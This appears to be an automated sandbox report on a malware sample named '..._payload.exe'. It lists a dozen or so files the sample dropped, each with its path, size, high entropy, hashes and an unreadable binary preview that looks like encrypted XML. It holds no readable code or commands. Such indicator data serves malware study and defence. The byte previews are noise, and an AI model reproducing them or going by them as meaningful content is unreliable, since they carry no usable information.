                                                                                                Preview:<?xmly.A....dN.S.1.C...../..|..+..b...*....>...@i..N?....z..5..../../......C|". 4....8"....j..!...+c.t.Gbb.....F.A.BU............4T.".x.3.R..61t...>.....S...8:..'.o#i+).q..ZI.....H..}..*.~z.._D...N&...t..=..>~$3......7....I.KD.l.......(.o..[&."O...C+........i.SOv.......@0.E>...}vE..g..H\..^.B........!..[w#ph........\V..5...[F....>.....2...t..u.8....^.).......@0D.".@.e...T..........R..8..6G.>#A.9...?.E......y..:..5.>`.(..~c.{jd.\p.P....x?lh1...f[..-w...n.Nsb.5Z.-D..TS.....!U....%..!.h3....S.p,..Zq...-..;......G.> G....^.G..7.g~...~....]._q.0 .a...N....>.........s7.3h..h.../...~.....L.y@*:...j...yo.8i...2......W...A...s..Y.F.I..C.&...)...rUa. .f...}#K.c.......D...bE...,U......D.)dOa.....*f."rt\u0.%)...q....Je.+~...a.[9.9Mdc.].k..fj..Q....%..Wp.s..+..tx..^.1.GsZ..P.Uh0...F....c....Q...=....$..2@..\.4..Y.*W.<8.......n...(. ..X.....t...kV.....m.J.]$.H.q..}T...NKo.% H*<..?67m..6..1.=.v.d..Z.O}H;.2+...s*..g.2...f.q.k.U<..%....-5..l.v..'...~.^1
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1726
                                                                                                Entropy (8bit):7.882100570800801
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:wTz1JNHJ4U8PEjnqFqFOqiK9c5sDTZpNTkNRVk8yfv6yVAlQpLD:wTzxphnqFIXitITZpBck8iSEd
                                                                                                MD5:E7A2FD51DD5526622CD9696B8D569E7C
                                                                                                SHA1:4743106FB19F8B16948422DF08102650DF378887
                                                                                                SHA-256:075F0F0C7D607CF7E149C0EDBA8CAE91DF1562662E0C00900950776396966148
                                                                                                SHA-512:0AB9B20A1F297C156EFC6EB48A349CB8B79469296136983946B351D72C3591BDE807E4AEADD4A26F8CCBC23A341028056E84EB4A6552CAC81FC48FF18DC05B6F
                                                                                                Malicious:false
                                                                                                Preview:<?xml.6..P.....,{m-.u.0.$&..._i.....".}...".,Zj.).'...cALa..j....uJ..OF@.e..h./?<n...|.z...g......|L!w.S../...............7B,.....S#........s...Z....7U...q...Z.o'.OD...N.\Z....K......w.B...D.J.p.V]....@,.A....N.Q[Q.T.&.9S....3...4A.{\./l.q..pM... .......9+J.Q5.G=..Jj...v..........;.....Gu..9.!...h.mM........>.t....+7F.xp._")B.~.,.i...M.is q.Z.hH.|<p...R.Y...t^.&et&..Od.|.B5..0..h....e.~.-T.M...p...)...A.......cn>...{.s....Jb=d4s.2..%y.70%0.x.\.tl.4 .1.L.../0.f.dK_..J.Q,...}@D|gE/.0!.44.X.....4....vg.i..!.@......m.'....f...2.N).0b@..Q.E..#%.e;.......)k.;.g)./.R.R..........6X..}..FY.L..8...o....g.....!].......n.;....~.R.}...+.I.3.U...?X].......>.|(e ..h.?...ap...."..,..d..%Xc;.I(.3.t.e..x.....2..:..^'.E`.3z........T%.7=....(I...R.u....`>......g}..S...O../..~xnB..m=.\.....?.`...yo..125...S..k...Y$m.j..."..l2.|..JL.Zx.Bg.s/.."...K.r"..W.&..a.}I.J."yZz./...0'~.K..jE...V.;W...Rv.]_I....2..B....iX.@...N.6..I(.@LHZ.l..$...?..q...x......cWs..U.&.D.V.I..;R
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1691
                                                                                                Entropy (8bit):7.89087885253751
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:F/mvbgbtfavSF/M8sytNTU5CsGfH9fGi92iMIqhca8XSOLD:F/mTgYvSF/Bf2eP9ZLqp8XS2
                                                                                                MD5:5020CB28DDAB5160701A88424E57C872
                                                                                                SHA1:7E112C5152661F83B43A374956C9EE7BDF5C5D7B
                                                                                                SHA-256:E2464A0B07B589130E8355A093B97D8F8EA93119F33DE8BFFE6A74D65A4D0A42
                                                                                                SHA-512:90325DBB26C3C95D0A28D8FB93FD457CBE4910001E25940D580EEF633C5C48C18CCC544292C82F04C0CBEA7EB08AE8FC0FFA0EC3FBCF7C25A46EB4E1BAAD9C1F
                                                                                                Malicious:false
                                                                                                Preview:<?xmlx...0w5....#>".to...-.<.f...s}O.....G7..fz....1...N...K.j.(5.\.........~3.|..~3 .?.m_VN..(.T..t....e...B...a7...D...ni...$M.G.3....K.......gu_.m.P..@.\.0.v...z.....P.(a.D....y.....(T:..gOS...}.i...Q.....2..... ._...~....-....!.7.`*[q.?C..:9. ....b..X..Pe..3M......O.4v.....\}....\.M....|."..s.Mo..........K.?./S..\.)UEElnJ.F...."..A+..w...0.U..q#... Q.{.R..M?..l...Y,...oK=+.....nP.&5N.=..y.+L..Sf4...6...IxV..]..7..u...M..$(.H.F..!nY.q..Z?Gtn\..2.....H..i....b..H...*+....OW|POl.2..$.N..J.P..5Q..[.Ua?...X......d...lr......f.qk.H.?..;%~..B:....~......b.&.....s...?._%..I:*..[.z..*..J..L.?....:n*.tm....]w.;?t'Y.".9g....e.1.u ......."....=.l.....2..C,.7.%...?=..S=.1..q7..-......|@n<...<.]i.l...H.T...Y.|f.}.N.b..X5s.J<;^.a\: KF[.....m...4_k.I...D...!.....K..t~b.T..M..k@b}.X....'../.G....~:pk.j.b........._.S....8.. i..6..rQK8.c.y....sf...w@`......7tGw..-.....5.Z..S....B.s....R..?[..#...]qV.M')...w.0..3...e#..;.O.v..~R[.k-.F..91X[X]._*uW...s.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1728
                                                                                                Entropy (8bit):7.89586477567173
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:uOxnVCc9fikVx9dy15zia+woW/zuf8u87fCHSOQFLD:XxVb9fV9d0zvFr/zuKfpO+
                                                                                                MD5:F70C46B137B0B42AD5746AA0D6E6BC26
                                                                                                SHA1:502A6A13A02A6747EC119BB610CE488CA830206A
                                                                                                SHA-256:E87F4980AB27BAFF9FBFF5F1F404E8397B86AA55D7D2EC6925870C0DBB2852A9
                                                                                                SHA-512:909CFBB814846C87FC3CEF37694E8CC677FCDD3F0033D671CF25B9ADA3D83AC9D6514850DC23BDEFE694CF5CF09F46718F422ABC97DEF90A7BE94464CC411459
                                                                                                Malicious:false
                                                                                                Preview:<?xml.Tx...x6.....Ln*.(};y..>b.Y..D.E.@HO.VD.UzC..{.s..,+.........Y.7W..w._.1I.x."....|.l..'a.@EU.*.._..........^......8....a..8S.1.M^wi.{y$%.[o^..'.&..w!F...t.'..e.r6........>........&.4..RP>8......f...q(.+.....$.Q.}....,T...|[.A.z...X.....F..K.#z3....,k..Oa....{.><[..4...'........c.'0.d..!a...Z...-R.....r.0.Y..i..~*C/...nMs..r)....c..%....\4.h.[l..?QV.L.9.....8......?.p7..Q.1.iG.uC..... .mt.3.d...s^...5....X..+....m.")J.xY...a.....Y..5.;1.V.9,.f.....3U0. .,_b....(.W..`J...~...G..[..........bL......d.1... _.?.r.Y,....).@w.. ..'^u4.......h..Q4=...mU@...k..[}.......;.:.d.{..L.....s...K.y...z.%....nK..9Q.K(S].?......=....9.F..........*...(..+..+...E4...PQ.+.k#L.W.....^:V^.....3`..pG/u.Q..-.m...8.e+0VE..;.Q.=.r...%(..U.I..v.p........:!..z....-.,...T...}|....u..m..\,......I...!.?.,.g&..`..f.c.\N..Kk...=..:..-..^.y..d#H).!..%..U....0.........y.V...o.......W....fh+. ..y.&.,.`.wTK..T..m.]...@...........)....|..D..!(......4.5?.\h[...&i.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1699
                                                                                                Entropy (8bit):7.890057453001084
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:dDwl1jE/bcBMEREHYsa7CEoICRrcthH2AlU6LD:Bwl1jE/bcBMbxa7CEo7FmhHzaa
                                                                                                MD5:18BD45EEE6F1EFC5B7955961F978AC47
                                                                                                SHA1:70204B5084ABAAFF5D55A4A4E19052F77A7D7DBF
                                                                                                SHA-256:8C15F02123DDF10FA7DD49B0AEE5EAF1272AC854C14B1BD4264D3EFF04CB6981
                                                                                                SHA-512:BEC2D3151061375B5FAABBE8DCE56C86FD72DA5A82D4F7831C40326D5D4476629A7A8BAAD5111924851A6B501AD5F0CC9670F5A55AC444BAFE96BB5086FDB3BF
                                                                                                Malicious:false
                                                                                                Preview:<?xml..Z.Q.zMG.MAzIS."..h......W.o.DV.\E......./../(.s.9a.<{JiS41..p.x ..D._^.W....y."W..Z...e.....u..D.&5U,....YB.... .vrHw....\...JT2.....'!.....yM..Y......f......;.f...N.7,.m...[D.|a..|P..[.{...ppK...p$.".n<.............k0.h?.'...B.{...FP7...*..W..R..XN.....G<~.I.f%...F.?.b....x........Os.>.P..k\$j.Dx....df.bS..AX.....HX..E....g.M.l.~.~.@...WG.Uu-....q....i..EAy.._x...0 }....p...V...9w....HMmO.6.....R.F..T.^S.>S...7.1..p..+....9@...w..(.....8..E..Z .......%.E.B7|.5_.>RJ d.'_<_...7;L.?..C.C.7i:....9!<.<[.Z..........t.....8.8(..&.#K.8..w....t..(./[@.(Z.).Y)5....t.O..8...>.e^1.S...K.0.e...T.=. <8.../..,..3.D.4`.ZT*...hE.e..Ppw.I..B).V.'^.c..#/.RXew?.#..my0.....\.113}A.\,..)x$J....bJibJLt....K..*..%iy..k..._.[..f..U.}+..[....., ...H..8.c.....2...^.....c........n.._Q!..~0...)p..."+..c2u.f...`v.Hj.........=I'... 2o...[.m...........T]...M....p}...@..d.x;.UH...t4.e...q{.....<Jo<...8w..z....{.g.|..;N;..A.....oBi.&.....]..Q:.....I...@aijR....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1736
                                                                                                Entropy (8bit):7.873796221661448
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:pxbhgHPNBYGiZcgZCBjfWqx1GEV+vh1LD:fyHPNHpgZCZWqx1GEV+vb
                                                                                                MD5:8DDB8700D7516A4E5B4A15E70DE435B5
                                                                                                SHA1:F0486150E8D69C90676F7CC2F1A715484E81DC49
                                                                                                SHA-256:E1056669B7F1113762FF2935A5483F690BCBEF40836D26D5740330938318ADC7
                                                                                                SHA-512:BB8ACC54129C29C7C13A08EBB495DC6295A140DC901E56C0657AE616E33F635F3F22237077DF50D28B2208672D8E0465D787DC541645D723005DCCC901C9DEEB
                                                                                                Malicious:false
                                                                                                Preview:<?xml....O..0....X...S.S..9.4}F.I...w.....@...v7B8fX...d4'..P....&..i...0...{...fv..o..T......{...wi.y-.0...<.....d..jy~....`%....K3.2..;...af,fNf...S.....^@-.C.4K|.2....-...N...a.z........)C."<...1...x.:..G..(.D..F.KEk........s.E1..Gr...!.&o.....S.nl.|......... +g.lO.F..W.|.\...#s.....ev...'b.(.CkH.#..B..Ba.r.W!.D}..q.2..~..iv"....c;.*c.!..!p.2.u.=].M.Np.X.\0l~. 3.i....!J.ig..=.F].I.]....8..K'...+/5..0=.@8...F.q.du....-.}Z._.......NOP1d.p.....|.4#........!x....Os.......iP.......2...7....!...D!..'C..|b1m$.......i@\...E`Q..B).u....u$Co.fC..E...8.e..9.......7...d..f.z..Q....s._....l......)UH..,.y`........q)z...7[j.G..}.....=.P....Px3l....<....54=..S....MY..s.>3..r{.s$.R...M..5.{@U...\4.{..+...n....+Xi.t....iz!.~.^8............).Y.....Ne...)zs#O.Ll...\.$.....Y.*F..H.......j.?...8.B..Hx...V......uP.-.n..>7.......X9.\Ph..U....JS..Bi.....?#(O..<..V...,.@t ..m..H........%..p..m/......R.i.p.|6f"2...J..r....#..8.*..g$..N.Z.G..Rv.b..$.5&PKgJ.I.i..pe.l'#.j
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1703
                                                                                                Entropy (8bit):7.874228504722003
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:2l2V/faaECj5kWhGW1IMyVJi3qg2V+v3MLy6e7zlccfNFhVTS1TaGjpgf1x3bD:W2J/EowA7yVJ9ckLy6+O4otHjALD
                                                                                                MD5:403E7DD4196E0B5355B20C1FD8B6C845
                                                                                                SHA1:71E6E14B40A502CFA21D021F1C0F101B1A67DF70
                                                                                                SHA-256:815B5979C54221553A3EAC33C217BC981DA6A2EC0BEA58BCDD540D57C0DB3B25
                                                                                                SHA-512:AD2C88E5E3189D69D4121DBB0B216BE37F43913A6D5A3BA5BD6B9787EACACC4606C074317B910526516147E47BDAEEC74F3F4559CA2907CDD4C3798D1D740D63
                                                                                                Malicious:false
                                                                                                Preview:<?xml.2!&.......S.w...c..es./....ZR+!5J..V...U...n-.2....}.._..S....c..|.k3I....]:`.iI..k.,@.x.a..ur..l...9.-...I .....QY.<...Xy.M..,..H.B.g.K,p:..t.TE.M.Z...^...]Q...f...........x..e...T..nC........yL}.]..R....@.h.....Eu..V.e...K.[....]8.0I.....*u.>....)g>...P......%.eu. ..j...S...g=.t8ek..{3.5.{o....;d.uq.*_..i..*....!X.FS.]fm.WY..b.....J......k!.O.X...D#.TS&...vY..C.q.&.yfC......w.\7b:p^..mD+.}....T....$..[.U!"....md.<..jD.b....4.5...+^5..`...sVz0.....$. E.D.........T..70U.....yq@.\..u.?.+'..:......*.5........L!...E.}..k..~.C.C..@.$..CJ.w#....].^~.O..U.......K.n.^[0_P..4..Co.s.6S....X.:t$.......e..Z..I....Sr.,<r..#..!}...$^........f..\.....yE=..D....,......^1.~.U..*+._L..O.Z#.6...t..4.5=..fP...........Y..>.t...M...Y..7.C$.i...p...gd..o.....*..wB.......R..e..N.{1.C5....S6.w2...S..S._>;.cg...V.....Kls4....Sc..O......,.r.H....oQ_..?MU{G.:.ht.|`..x..sS.m....zY6R:.l.H...a.."z....p..0...C..!.@...#nDtz..y...1..v..I..e..._.m.+k...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1740
                                                                                                Entropy (8bit):7.884645762285151
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:nh/faKQaU9XeFUWrT9bUAjZOY6mzxlDvvLD:nAKpu8UWHdFPrzzT
                                                                                                MD5:1C1B3BE039018378665F3C3E7E25D9E9
                                                                                                SHA1:74C621889A1E8F0EBF1F88C32915EC244DB53112
                                                                                                SHA-256:A388D010A16BFE82B96965554F65CC274D4157114BCFD15F503EF7373D28621F
                                                                                                SHA-512:2AB07B1F94FD0B3DD05849F75D8A0424488DFEBF138FD3D4AAD5F5C118A380A6C94F6FFF0147A482C632688F642E6A12E633614938CC65B1AE9274E390FEA56D
                                                                                                Malicious:false
                                                                                                Preview:<?xml\....X....t8.Qr.O..f/.........;...(....Y..P.c.$..l..A;......=&o_....-...7.....gc...N.?.eeC..c..S..!.G....-.'.p..K7.....-.?..#UlL..y...\,.o/k.19[....L.!..}/.K........7........E.....-.,Qr......W....8.gEYkv....y3.x...\...'..=FR.,.....G..y.d.N..\.7.@.........#6l..S..L.[.Q.p...q/....,......2.. ..m2[..."....{OO<7..[....M..y)2e4...eg...t'w!2/.a......e......s?p.]...!$.{.H....~.W+..,.w..y.*)..v..].I...~"...;......:i5T..Ti.G...%(..5.....w.*.,Em..Q{X.(.!....Dx..Qx.O.........&...v...>k.7...<V..X&ZZ/..a...H..i9...5....B.....%b.AE.t.....'.b.<..m.e...)m`..k.D{T.K..{.I$.i..*}P...{.-.b...~.f.S..Y...Y.$.........b{'.......l".q..<..f.p...@6.)tZ..![4.T.C...t.&.(6..+<i..r..2u..hm..W..."....1..d.G;.|......R^.3%}.6....Q....ux..T6.....1.i].......oi....b8.u<.....H...z.9..S9.H.l7V.Q.\...j<.....K9..Eo3...MDbn..[.....'.V..\:...N}.I..t.......&?2&-_....a...6,;8....[......]..~.'..+.2..e..........f7.........c..8N......K@..f..<P?;j>.a...yF ...r..\..&E_e".
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1697
                                                                                                Entropy (8bit):7.8681105716756035
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:NADX7TLsPAlqOLj9/M4xQG2A5mzYZUsjHIFTlthHbz4giXtox3bD:Wz7TgPZ0j9E4xQTcmzYKmHAlH/4J6LD
                                                                                                MD5:C26F9E521C611D326BADD6A0203E2E50
                                                                                                SHA1:5E47DD082CE5D49E0E10587AC13772401476CE1A
                                                                                                SHA-256:AA6AF22B8F89711F972C8FB215F7ADAF4D13BAAE9488FEE8249BE395C52930AE
                                                                                                SHA-512:33A427A036B58DA17D30354A485F909B97CC03C1546D7C40451C8829C9DD7401ACAD2AAC5C6B9ADE16FFD78495373B6A23F490BBD1C2191E7A24CAB90B6B3035
                                                                                                Malicious:false
                                                                                                Preview:<?xml......X..N@......X..?..v)..#.....u|...J...................w.=..b#...../=0..:;....}..o..D.?}..I0..#J[Dn.+...R.'.H....=rbc_.{...N.....I.n.]at.....A.90Kvme.@..........XFo...K...<2......4....sC1.j._..Fw..!.......i.CA.bl.rU...C. ....S...F.XD.5......Roi\.enB..}.@.R....Vp...;.....!...3.[.b.......,,z&s.k)...xj.;..<~.7?..e%.M..t..y9Ptm..D..t..Z.>.....#"...-+.s9...p...A.M@a&F..S.....b..O4^N8.........r....>cU!.,..k........U....<.8..Q.......$..Do^....hXe..0.O8B....@.<.uh..<.9.]...)o.D......-....$...f.<].......8u".V..=.z....;...._..GcP g.R.....0p....1D.......0.T.V{..'.E.|....2....o.#.A.]...=...6rIz./}6..u.Me,..Cj|....n.<K...V..I.. i\@.........~.-w.{..4`...57.&.a...a.h{x.>......\.k..zWN.E........,./!.l.[D..I....(..*V\.J..=B3G...1.Pr...X..f*..~7..S..p...D.:.....(.3.A".b.*u>..{.d..R..L...xe..w..O.M~&+.P..Xq...4lG.A#{..........ix.J.f....xl.%DZP...k_k. ].:R...<]g0.{..qP.....Ax|7j Ph...5...1.}..d8H1.l..Nk..\^t=.2.k..-.HP.[e.....B..V...!|.@.....;..p.N.....H...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1734
                                                                                                Entropy (8bit):7.885284180089983
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:tC6TYBSLg2mFCtZ/9YKj8OjyILReI6ez4Wn+k0OLD:c6TPL7ZozeUC+k02
                                                                                                MD5:DD54DF3DF5861A1105E9574EAD971CF1
                                                                                                SHA1:9A9AD60703425EA17F554A9CD62E94C7D0D09C17
                                                                                                SHA-256:607A35EBBAB302807497FB1FF6EB90452F690ED74B2611EB5E39E1522CA0AA67
                                                                                                SHA-512:319B3E44737B36A75C45685E3F761C2A6E3FFAE54DB4F6B82581F12264E31A75E7E05FB8B2368AB00E7C100931E7907F566044052CFA07741270B0E74198D795
                                                                                                Malicious:false
                                                                                                Preview:<?xml....T.6......@..m....l.|6..C...l.\-G..(...n{.:.....Z.C|..E.a4.[{v....Yk...;,mH)QW:W.r..#.....q!tybJp..`&%...h4...7....{lZt.u....>...r%'..T....47..l........c...m.>I.T)......`.M5.O..].k.w'.+..$..c.'....8.g.>O.DHB.]q.....O,.T^.gKp..jn.8E~1.....F..........K.$.q.zR..U.K...F.....3.......E.......w\..u....w*....@...............|.v.6...2C..%Y.it.j..w.F..r-(.D.b.?.....{....-..?....|\d.._...c.w.w....^...Q..1.;..9f..9&.~_....i.,L...g.....0..........@.0..`5 h...fo.7.`z../@....Gw...?U.....!.......L..y2..4.v....r..]....U.d..j..&.-...\..1~...........1..i......tl...C)Ij%^..kj...(.)...e...K...VB.:.3.g. 0..uUXJ.$.sZ..r..i..K=........H.T5.3.^..b.`BC.D.Gu/}C.9......+!..._..........N.....Y.(.4I.....e{3.H...j.A..}..rn.j.$........=.eb.N`X.A.:.....$_@.|V..pK..}.....vW..D0....yD...%.;...x...........kE....{...Z|....WR....H...&.D...T.....J.t...1.zb.......*.:....^.\...$....A..a<,.W.A..=.B<.Z|[:.Gb.@.M+./..Mk.$.D... .g..B.b.;C^t..@..C......[...OyS.kt7
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1697
                                                                                                Entropy (8bit):7.839711892020789
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Wua5l457PPh8qCouXk83MjHqqKrFbV5m/TMLD:Clc7d3Qk88+qIV5mE
                                                                                                MD5:272C01860219290B7B9BBC2C72A10DF9
                                                                                                SHA1:0F2C21BA3177A51913B179E8784E7C184D69D8ED
                                                                                                SHA-256:0C48B8EF5685D890BE9FEF1B09F4D1861F3EC5578FBF6EEEEABF3BB14A8F9F14
                                                                                                SHA-512:CE2A2F700F2CFA994ECE347F274047EE7F7A69B74FD4FD2C666F3EB11F8BEE3B53CD6FF47B9B8F06A2436B93252B59CE8A44B156FC7687BA53DFB3B59F0ED7C2
                                                                                                Malicious:false
                                                                                                Preview:<?xml.K........._...v.7..c.w#.b.>...t.....)u.E...mN.c...jB.'fw...*.w;...T.?..n.Y.....4..En:.RrZ.q6JJ.*....Y.4.-8.. .W.:la...Ew...J..h..!.[..w...-=...GU..E..R...?.+.......9.[."EM...gS1.i._]8...@?.a}.=.....i.R.a+..z6.....b.H.ad...[R..&hQK..2E..?"r.G....r.{..;+J...J..+L.Q%....V(.i.N]s.4gU.j......u}EdO....;..w.^.6[.V..e..J.....f.......S.|....E..pR:..&8...T.^...b.....w.,...6..k2..$..j"]R;Q.+._...X...,..b....3..U:/.%.....>.=....a..p.....^K8....I!...g.*.O.0%........K....$.C.@...[.w.....^&..e.MG......a!.UD...x2I..N+&.D#F..9]WO,qr;.o:..#......;..\..=.O.h.h...'z.@7.k.].a.X\..3.B.. ...h:h...Uu..}..^...a..m.c..,*.3/..*.^...&x[Ek<l.l..."y..,.v..'.HG..r....0<.V.(.H.....HFP.%..b.m.w.,....@..S....%.r}.H?....LT..+6..!.)...$..~4L4[$.4..s;.(J./.c...>.+.b\...l?....0"..b.tI....EC..X.JA...M...(..g....o.+...W...../%y...)..\&c.j..q...FJ.w..7.=..#.i2.T.!..H..!..i.$1.I!.......%(.P...y.'Ae..v..r~.p=K+O^.. ....JR,.......C.(.D6.{.{.........U...,...MZ......hv.F.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1734
                                                                                                Entropy (8bit):7.878759606863669
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:w/+ONBmnQu6Jie1eFK3BFfW7gfPfagvwmgnBpuYsLD:w/+OanQu64NK3BFfWcfP2mOE
                                                                                                MD5:DB226B002C727C5A464DE704634E73CF
                                                                                                SHA1:FEADEA149E3CCD30BA5A95FDB522AF1778B65C35
                                                                                                SHA-256:671568ACD6F8805B48FB6FEE528A97FD50939322D19DAD86558F6ADF79B44D29
                                                                                                SHA-512:8B98EC11601FCDB147EFE0968550BF5E83D47DC106550D0DD266C04CC2E1B96E093AA043086CA6977D7E4A3448934FB98654D9BAA588E8703796107AA8B0EDEE
                                                                                                Malicious:false
                                                                                                Preview:<?xmlMu......R8....R... ....n...&...?..!.C..G.h.t....i5.J..E[.p.....s9....s.....cq..V-.aR.a........qvU.#U7...nx-... .#.....p.s..s..B...........K.`.L.q./.l0.hr..6.>..........:P...fpx..S..?5.(I(....v.....b..k...r..^.../.>(.N...!..M.`..6tEQK..6=.n.wb.O.bt..7.T.O...~..H...<.S...,a.d..\x.G..<Z..N2..0..... ....V...a+.4{.w.}.`K"+....w.. .@(.{'eO0.Y......x....bX....V...C..{F......[A.w.A......./*..M.5R.4..t..C8..:......H......T.}Dt.P.Uq.......&.mC.rTf}.k.a..G,S_.......5....%.3.........t.X.....r..aI..8..S.O4{.~.\R7....DGC".ROa..O..s.I.t.....QO6.X'..f...;.......'.h.*...=...pnJ{........o.G....J..K..<..Nj~....l.xv....J\..|T..2Bq..U..$...V.i.......5..+?...yq.m..,.-..{........h<.0%.T....L..)H..zX.3(.+...b\.C..^.h.4.;...'g<.~U.Q.L...W9.r:.s.....H.....,.m......v. K.Wl....?..r.a....]M...............5q.....Jh......yW......m..hB...8...r..g...x..w3.,........+..nJ@....b1,.`%$.E .O..k2.\..c..,=A...g..9.`8(./rRX.lu..C...EtR8.....6a._+...Nypd.._r..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1701
                                                                                                Entropy (8bit):7.891632066156904
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:GbMa+5aXqU4k9+ZEsisLmpxHDEXVRR0DEIeq1Su06tcKiTDpj3/lQwsV9wrEP+GM:Cl+5a6U4P3lcAIsu7Or5liVg3xVLD
                                                                                                MD5:1F480FDFFEB7CFE15A114EE5F10076AD
                                                                                                SHA1:DA7010F1AE36C7201036B61BBFE0D8F2E88E313A
                                                                                                SHA-256:7B79FB416843BAB3A538149EA3990A3E906592D72023F6D1DAC02AF308289E5E
                                                                                                SHA-512:9F8CE011C43B7DE96C90EF4583DFE8215C0E10EE1863EED5CA207DDE7C0483BB4956D8B32064767665591E78C8DB175B3298283E84A02FD18CEE5636E75205BA
                                                                                                Malicious:false
                                                                                                Preview:<?xml#..\Zl....@..a?....u.&.....)X.Ea.X-.k.J..f..Ph.B.w..8...8u....|*.+$.e....z.y..N.`D.j.3...B^...u..,......3.(..Dd.......R..7%.G....?....R.`.{..I.....\.p0..b........C....3.n5..*........&a.4.X..o.k..O.7Q.`bl.......+\..]...W.....4V...+..H........s<n.-_...h.....k....Z.Z.m....s..Uj.q.W.S~._"{GN;`.!q`.............0..(..]X..h..s.bQ`...h.f.....?...$...7.(.,.tw}vV..K7 .w5..(cf...Y&.P....m0...../.JO..9.Qd.R...|.9I......g...=:.I......(..T...w.]Xa.......I."...n4[..'...~....'.Y.....:=|m.0....9O.0......h...q....#.r..]...."8=...G...<%8...?3..>.2O".D..j.M..y@R`..pw.o....:d....E...<.g....B.l.qx...XL.....'...)gU..I.z..A.....O|\.?...xt..K...U. 2.3..'.8.....g'.......Q{..6.w.0..-..Px.1P....IC..^;..1.,...F.W.\.e+..-.].{7...9..#k....8.C..^._}=.ZU...M.p..xAvS.7...4TP....J..T..}..;.a...@Ue.HeA.S.J....H;.|..i.%...Qu3.. ..%.X'...+.m.5.,...q..._.x..... Q....#.....[*..Ms.:...v%..w...k[T.E...s..*..C..P.....W7+..<4...n_.....X|3...m3.O.lL.p.t{.~Y.+1.F..}O..o$.!,s@
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1738
                                                                                                Entropy (8bit):7.89337839554498
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eRIaMBPv4lK4k9CVFpvAvOTk6LAN3dpLPndQsLD:eCpNAc4u4+6sp7ndQo
                                                                                                MD5:2F29FB8390D3AE1B499C9420A272F7B8
                                                                                                SHA1:2D699462FFCA52578602F515F5314ACD740D152F
                                                                                                SHA-256:7FDC86CFDBFFF96311A649068BA41E94ADCEB3003B01AA7700862A45D67996E9
                                                                                                SHA-512:CF32DF29378B8FA81B53209104A0B4C1748366BF484DD08385A0C06268CCD910519FBDD9B3473B05F2DAE356F073805C9E591DCE21788A473637A72DB142608D
                                                                                                Malicious:false
